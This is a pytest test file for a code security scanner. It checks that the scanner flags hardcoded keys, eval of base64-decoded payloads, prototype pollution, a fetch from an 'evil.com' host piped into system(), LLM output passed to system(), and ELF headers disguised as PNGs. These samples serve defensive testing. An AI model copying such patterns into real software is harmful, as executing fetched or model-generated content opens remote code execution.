import pytest
import os
from gitgalaxy.security.security_lens import SecurityLens
import base64
from unittest.mock import patch


@pytest.fixture
def lens():
    """Initializes the Security Lens with default policy thresholds."""
    return SecurityLens()


# ==============================================================================
# TEST 1: THREAT SIGNATURES & REGEX EXTRACTORS
# ==============================================================================
def test_security_lens_threat_signatures(lens):
    """
    Proves the engine detects specific logic bombs, shadow imports, environment
    poisoning, and credential leaks using its internal regex rules.
    """
    malicious_code = (
        "// 1. Vault Door (Private Info)\n"
        "api_key = 'A1B2C3D4E5F6G7H8I9J0K1L2M3N4O5P6'\n"
        "\n"
        "// 2. Executioner & Trojan (Danger & Safety Neg)\n"
        "ini_set('disable_functions', 0);\n"
        "eval(base64_decode(payload));\n"
        "\n"
        "// 3. Shadow Imports (Steganography)\n"
        "require('hidden_payload.png');\n"
        "\n"
        "// 4. Environment Poisoning (Flux)\n"
        "Object.__proto__ = { polluted: true };\n"
    )

    result = lens.scan_content(malicious_code, 15)
    counts = result["counts"]

    assert counts.get("private_info", 0) > 0, "Failed to detect high-entropy API key!"
    assert counts.get("safety_neg", 0) > 0, "Failed to detect safety bypass (ini_set)!"
    assert counts.get("danger", 0) > 0, "Failed to detect executioner payload (eval)!"
    assert (
        counts.get("shadow_imports", 0) > 0
    ), "Failed to detect steganographic import!"
    assert counts.get("flux", 0) > 0, "Failed to detect prototype pollution!"


# ==============================================================================
# TEST 2: SHANNON ENTROPY & GLASSWORM OBFUSCATION
# ==============================================================================
def test_security_lens_shannon_entropy(lens):
    """
    Proves the string extractor drops small strings but accurately calculates
    Shannon Entropy on large, highly randomized base64/hex blocks.
    """
    # A highly random string wrapped in quotes (length > 64 to bypass the C-engine shield)
    high_entropy_str = (
        "x" + base64.b64encode(os.urandom(100)).decode("utf-8") + "y8f!@#$A9Z"
    )
    code = f'var payload = "{high_entropy_str}";\n'

    result = lens.scan_content(code, 2)
    counts = result["counts"]

    assert (
        counts.get("entropy", 0) > 0
    ), "Failed to calculate high Shannon Entropy on obfuscated string!"


# ==============================================================================
# TEST 3: N-DIMENSIONAL TAINT ANALYSIS (The LHS Slicer)
# ==============================================================================
def test_security_lens_taint_slicer(lens):
    """
    Proves the engine can track multi-line taint from I/O sinks to execution
    sinks (RCE), and from LLM Hooks to RCE (Agentic RCE).
    """
    code = (
        "// Scenario A: Standard Tainted Injection (Multi-line)\n"
        "let user_input = fetch('[http://evil.com/payload](http://evil.com/payload)');\n"
        "system(user_input);\n"
        "\n"
        "// Scenario B: Same-line Prompt Injection\n"
        "invoke(fetch('[http://api.com](http://api.com)'));\n"
        "\n"
        "// Scenario C: Agentic RCE (LLM output fed to execution)\n"
        "ai_response = openai.chat.completions.create(prompt);\n"
        "system(ai_response);\n"
    )

    result = lens.scan_content(code, 10)
    counts = result["counts"]
    snippets = result["snippets"]

    assert (
        counts.get("tainted_injection", 0) > 0
    ), "Failed to track I/O -> Danger taint path!"
    assert (
        counts.get("prompt_injection", 0) > 0
    ), "Failed to detect Same-Line Prompt Injection!"
    assert (
        counts.get("agentic_rce", 0) > 0
    ), "Failed to detect Agentic RCE (LLM -> Danger)!"
    assert any(
        "[LLM State -> RCE]" in s for s in snippets.get("tainted_injection", [])
    ), "Failed to log the Agentic RCE snippet!"


# ==============================================================================
# TEST 4: THE AUTO-GEN SHIELD
# ==============================================================================
def test_security_lens_auto_gen_shield(lens):
    """
    Proves that machine generated code bypasses taint tracking and homoglyph
    searches to save CPU cycles and prevent false positives.
    """
    code = (
        "/* eslint-disable */\n"
        "// Auto-generated by Swagger\n"
        "import \u0400 from 'weird-unicode';\n"  # Homoglyph
        "let x = fetch('url');\n"
        "system(x);\n"  # Taint sequence
    )

    result = lens.scan_content(code, 5)
    counts = result["counts"]

    # Homoglyphs and Taint should be explicitly skipped for auto-gen
    assert (
        counts.get("homoglyphs", 0) == 0
    ), "Auto-gen shield failed to block homoglyph scan!"
    assert (
        counts.get("tainted_injection", 0) == 0
    ), "Auto-gen shield failed to block Taint Slicer!"


# ==============================================================================
# TEST 5: EVALUATE RISK & NETWORK GRAVITY
# ==============================================================================
def test_security_lens_evaluate_risk(lens):
    """
    Proves the Network Gravity multiplier correctly amplifies threshold policies
    for highly central 'God Nodes' in the graph.
    """
    hits = {
        "danger": 50,
        "io": 20,
    }  # 70 hits in 100 LOC = 0.70 density (breaches 0.65 threshold)
    loc = 100

    # 1. Standard File
    standard_risk = lens.evaluate_risk(hits, loc, network_metrics=None)

    # 2. Central 'God Node' (Blast Radius > 1.0)
    network_data = {"normalized_blast_radius": 2.0, "betweenness_score": 0.1}
    amplified_risk = lens.evaluate_risk(hits, loc, network_metrics=network_data)

    assert "Data Injection Risk" in standard_risk
    assert "Data Injection Risk" in amplified_risk

    # The amplified risk density should be drastically higher due to network gravity
    assert amplified_risk["Data Injection Risk"] > standard_risk["Data Injection Risk"]


# ==============================================================================
# TEST 6: BINARY X-RAY SCANNER
# ==============================================================================
def test_security_lens_scan_binary(lens):
    """
    Proves the X-Ray scanner detects Magic Byte mismatches, embedded execution
    headers (ELF/MZ), and extreme binary entropy.
    """
    # 1. Magic Byte Mismatch: Claiming it's a PNG, but providing an ELF header
    fake_png_bytes = b"\x7fELF some other binary data here"
    result_mismatch = lens.scan_binary(fake_png_bytes, ".png")

    assert (
        "sec_extension_mismatch" in result_mismatch
    ), "Failed to detect Magic Byte mismatch!"
    assert (
        "sec_danger" in result_mismatch
    ), "Failed to detect embedded ELF execution header!"

    # 2. High Entropy Binary Payload
    random_bytes = os.urandom(50000)  # Large sample size guarantees entropy > 7.95
    result_entropy = lens.scan_binary(random_bytes, ".bin")

    assert (
        "sec_heat_triggers" in result_entropy
    ), "Failed to calculate extreme binary entropy!"


# ==============================================================================
# TEST 7: THE GOD MODE OVERRIDE (100% COVERAGE SWEEP)
# ==============================================================================
def test_security_lens_god_mode_coverage_sweep(lens):
    """
    Triggers every remaining catastrophic threshold, empty state fallback,
    and exception handler to achieve 100% branch coverage.
    """
    # 1. Empty Entropy Fallback
    assert lens._calculate_shannon_entropy("") == 0.0

    # 2. Total Threshold Breach (Triggering every risk vector simultaneously)
    apocalyptic_hits = {
        "heat_triggers": 500,  # Hidden Malware
        "graveyard": 500,  # Logic Bomb
        "io": 500,
        "danger": 500,  # Data Injection
        "memory_corruption": 500,  # Memory Corruption
        "private_info": 500,  # Secrets Leak
        "agentic_rce": 1,  # Critical Agentic RCE Override
    }

    doomsday_risk = lens.evaluate_risk(apocalyptic_hits, 100)

    assert "Hidden Malware Risk" in doomsday_risk
    assert "Logic Bomb Risk" in doomsday_risk
    assert "Memory Corruption Risk" in doomsday_risk
    assert "Secrets Leak Risk" in doomsday_risk
    assert "Agentic RCE Risk (Critical)" in doomsday_risk

    # 3. Binary Scanner Exception Handler
    # We pass a valid byte array to survive the header scan, but mock the Counter
    # to throw an exception, proving the except block safely swallows it.
    with patch(
        "gitgalaxy.security.security_lens.Counter",
        side_effect=ValueError("Simulated math crash"),
    ):
        result_crash = lens.scan_binary(b"\x00" * 300, ".bin")
        assert result_crash == {}
